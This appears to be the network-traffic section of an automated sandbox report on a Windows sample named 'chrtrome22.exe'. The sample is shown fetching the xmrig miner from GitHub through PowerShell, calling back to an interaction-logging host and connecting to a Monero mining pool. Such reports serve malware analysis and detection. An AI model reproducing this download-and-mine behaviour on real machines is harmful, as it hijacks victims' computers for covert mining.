                                                                          Jan 9, 2025 08:42:12.771327019 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.771362066 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.854778051 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.854809046 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855043888 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.855068922 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855118036 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.855253935 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855268002 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855329037 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.855335951 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855371952 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.855844975 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855858088 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855910063 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.855916977 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.855952024 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.856409073 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.856427908 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.856477976 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.856483936 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.856518984 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.856802940 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.856817007 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.856865883 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.856870890 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.856909990 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.857553959 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.857568026 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.857615948 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.857620955 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.857631922 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.857646942 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.857671976 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.857676983 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.857698917 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.857718945 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.858234882 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.858252048 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.858314037 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.858325958 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.858364105 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.941503048 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.941545010 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.941734076 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.941735029 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.941761017 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.941802979 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.941973925 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.941988945 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.942043066 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.942050934 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.942096949 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.942398071 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.942411900 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.942465067 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.942471981 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.942506075 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.943290949 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943305016 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943357944 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.943366051 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943401098 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.943726063 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943739891 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943789959 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943797112 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.943804026 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943818092 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943834066 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.943865061 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.943869114 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.943903923 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.944673061 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.944685936 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.944731951 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.944740057 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.944747925 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.944762945 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.944787979 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.944817066 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:12.944820881 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:12.944856882 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.028508902 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.028542995 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.028606892 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.028633118 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.028650999 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.028672934 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.028815031 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.028830051 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.028879881 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.028887033 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.028923035 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.029356956 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.029371023 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.029417038 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.029423952 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.029460907 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030005932 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.030019999 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.030060053 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030067921 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.030095100 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030112028 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030421019 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.030455112 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.030493975 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030500889 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.030512094 CET44349731185.199.110.133192.168.2.4
                                                                          Jan 9, 2025 08:42:13.030527115 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030543089 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030570984 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.030889988 CET49731443192.168.2.4185.199.110.133
                                                                          Jan 9, 2025 08:42:13.452697992 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:13.452745914 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:13.452821016 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:13.453330040 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:13.453341007 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:13.914580107 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:13.914659023 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:13.916553020 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:13.916564941 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:13.916870117 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:13.917927980 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:13.963325977 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:14.364876986 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:14.364969015 CET44349732172.67.144.26192.168.2.4
                                                                          Jan 9, 2025 08:42:14.365080118 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:14.366820097 CET49732443192.168.2.4172.67.144.26
                                                                          Jan 9, 2025 08:42:14.553808928 CET4973380192.168.2.4206.189.156.69
                                                                          Jan 9, 2025 08:42:14.558737040 CET8049733206.189.156.69192.168.2.4
                                                                          Jan 9, 2025 08:42:14.558866024 CET4973380192.168.2.4206.189.156.69
                                                                          Jan 9, 2025 08:42:14.559185982 CET4973380192.168.2.4206.189.156.69
                                                                          Jan 9, 2025 08:42:14.564062119 CET8049733206.189.156.69192.168.2.4
                                                                          Jan 9, 2025 08:42:15.471927881 CET8049733206.189.156.69192.168.2.4
                                                                          Jan 9, 2025 08:42:15.520550966 CET4973380192.168.2.4206.189.156.69
                                                                          Jan 9, 2025 08:42:15.686583996 CET4973380192.168.2.4206.189.156.69
                                                                          Jan 9, 2025 08:42:15.876914024 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:15.876965046 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:15.877038956 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:15.877403021 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:15.877417088 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:16.716428995 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:16.717900991 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:16.717921019 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:16.718869925 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:16.718939066 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:16.721658945 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:16.721729994 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:16.770621061 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:16.770642042 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:16.817648888 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:16.906353951 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:16.958116055 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:21.812233925 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:21.864269972 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:28.008239985 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:28.098671913 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:33.896264076 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:33.991385937 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:46.911585093 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:46.989465952 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:42:59.011101007 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:42:59.098855019 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:43:15.051954985 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:43:15.098779917 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:43:25.179611921 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:43:25.301953077 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:43:28.041898966 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:43:28.098834991 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:43:38.850022078 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:43:38.989541054 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:43:48.875004053 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:43:49.099006891 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:43:49.464860916 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:43:49.599066973 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:44:02.090001106 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:44:02.302038908 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:44:12.623097897 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:44:12.802092075 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:44:28.072976112 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:44:28.302124977 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:44:32.393383980 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:44:32.489633083 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:44:42.660494089 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:44:42.802145958 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:44:57.640120983 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:44:57.802145958 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:07.707211018 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:07.802162886 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:20.886908054 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:20.989661932 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:24.482969999 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:24.599006891 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:34.184617996 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:34.227339983 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:34.376477003 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:34.489648104 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:34.522001982 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:34.599020004 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:34.601505041 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:34.601512909 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:34.803838015 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:34.989661932 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:35.484626055 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:35.484654903 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:35.686544895 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:35.802161932 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:45.023732901 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:45.099010944 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:45:55.486859083 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:45:55.599044085 CET49734443192.168.2.4141.94.96.144
                                                                          Jan 9, 2025 08:46:05.639117002 CET44349734141.94.96.144192.168.2.4
                                                                          Jan 9, 2025 08:46:05.802272081 CET49734443192.168.2.4141.94.96.144

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 9, 2025 08:42:09.399863958 CET6406953192.168.2.41.1.1.1
                                                                          Jan 9, 2025 08:42:09.407200098 CET53640691.1.1.1192.168.2.4
                                                                          Jan 9, 2025 08:42:10.496068001 CET5961053192.168.2.41.1.1.1
                                                                          Jan 9, 2025 08:42:10.502631903 CET53596101.1.1.1192.168.2.4
                                                                          Jan 9, 2025 08:42:13.425649881 CET5822153192.168.2.41.1.1.1
                                                                          Jan 9, 2025 08:42:13.451942921 CET53582211.1.1.1192.168.2.4
                                                                          Jan 9, 2025 08:42:14.373112917 CET5750853192.168.2.41.1.1.1
                                                                          Jan 9, 2025 08:42:14.552632093 CET53575081.1.1.1192.168.2.4
                                                                          Jan 9, 2025 08:42:15.866225004 CET6401453192.168.2.41.1.1.1
                                                                          Jan 9, 2025 08:42:15.874085903 CET53640141.1.1.1192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 9, 2025 08:42:09.399863958 CET192.168.2.41.1.1.10x375eStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:10.496068001 CET192.168.2.41.1.1.10x10aaStandard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:13.425649881 CET192.168.2.41.1.1.10x9bcfStandard query (0)evilbit.proA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:14.373112917 CET192.168.2.41.1.1.10xe6bfStandard query (0)wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.funA (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:15.866225004 CET192.168.2.41.1.1.10xe25cStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 9, 2025 08:42:09.407200098 CET1.1.1.1192.168.2.40x375eNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:10.502631903 CET1.1.1.1192.168.2.40x10aaNo error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:10.502631903 CET1.1.1.1192.168.2.40x10aaNo error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:10.502631903 CET1.1.1.1192.168.2.40x10aaNo error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:10.502631903 CET1.1.1.1192.168.2.40x10aaNo error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:13.451942921 CET1.1.1.1192.168.2.40x9bcfNo error (0)evilbit.pro172.67.144.26A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:13.451942921 CET1.1.1.1192.168.2.40x9bcfNo error (0)evilbit.pro104.21.95.99A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:14.552632093 CET1.1.1.1192.168.2.40xe6bfNo error (0)wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun206.189.156.69A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:15.874085903 CET1.1.1.1192.168.2.40xe25cNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:15.874085903 CET1.1.1.1192.168.2.40xe25cNo error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:15.874085903 CET1.1.1.1192.168.2.40xe25cNo error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                          Jan 9, 2025 08:42:15.874085903 CET1.1.1.1192.168.2.40xe25cNo error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • github.com
                                                                          • objects.githubusercontent.com
                                                                          • evilbit.pro
                                                                          • wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449733206.189.156.69806568C:\Users\user\Desktop\chrtrome22.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 08:42:14.559185982 CET186OUTGET / HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                          Host: wydkowqbjycsuwapzymz8ia5edhi9t1d7.oast.fun
                                                                          Connection: Keep-Alive
                                                                          Jan 9, 2025 08:42:15.471927881 CET366INHTTP/1.1 200 OK
                                                                          Access-Control-Allow-Credentials: true
                                                                          Access-Control-Allow-Headers: Content-Type, Authorization
                                                                          Access-Control-Allow-Origin: *
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Server: oast.fun
                                                                          X-Interactsh-Version: 1.2.2
                                                                          Date: Thu, 09 Jan 2025 07:42:15 GMT
                                                                          Content-Length: 72
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 37 64 31 74 39 69 68 64 65 35 61 69 38 7a 6d 79 7a 70 61 77 75 73 63 79 6a 62 71 77 6f 6b 64 79 77 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head></head><body>7d1t9ihde5ai8zmyzpawuscyjbqwokdyw</body></html>


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449730140.82.121.44436568C:\Users\user\Desktop\chrtrome22.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:42:10 UTC219OUTGET /xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                          Host: github.com
                                                                          Connection: Keep-Alive
                                                                          2025-01-09 07:42:10 UTC973INHTTP/1.1 302 Found
                                                                          Server: GitHub.com
                                                                          Date: Thu, 09 Jan 2025 07:42:10 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                          Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250109%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250109T074210Z&X-Amz-Expires=300&X-Amz-Signature=14b843eca34096be30cd757c45ce4cc4b792e87b295ec80813503823aca60371&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream
                                                                          Cache-Control: no-cache
                                                                          Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                          X-Frame-Options: deny
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 0
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          2025-01-09 07:42:10 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                          Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449731185.199.110.1334436568C:\Users\user\Desktop\chrtrome22.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:42:10 UTC658OUTGET /github-production-release-asset-2e65be/88327406/cbb07403-ee0c-4c81-9ded-5d5497635b93?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250109%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250109T074210Z&X-Amz-Expires=300&X-Amz-Signature=14b843eca34096be30cd757c45ce4cc4b792e87b295ec80813503823aca60371&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.22.2-msvc-win64.zip&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                          Host: objects.githubusercontent.com
                                                                          Connection: Keep-Alive
                                                                          2025-01-09 07:42:11 UTC863INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 2666251
                                                                          Content-Type: application/octet-stream
                                                                          Last-Modified: Sun, 03 Nov 2024 07:56:35 GMT
                                                                          ETag: "0x8DCFBDD0A034A6E"
                                                                          Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                          x-ms-request-id: 4b93fb7f-701e-006d-20c0-4d551e000000
                                                                          x-ms-version: 2024-11-04
                                                                          x-ms-creation-time: Sun, 03 Nov 2024 07:56:35 GMT
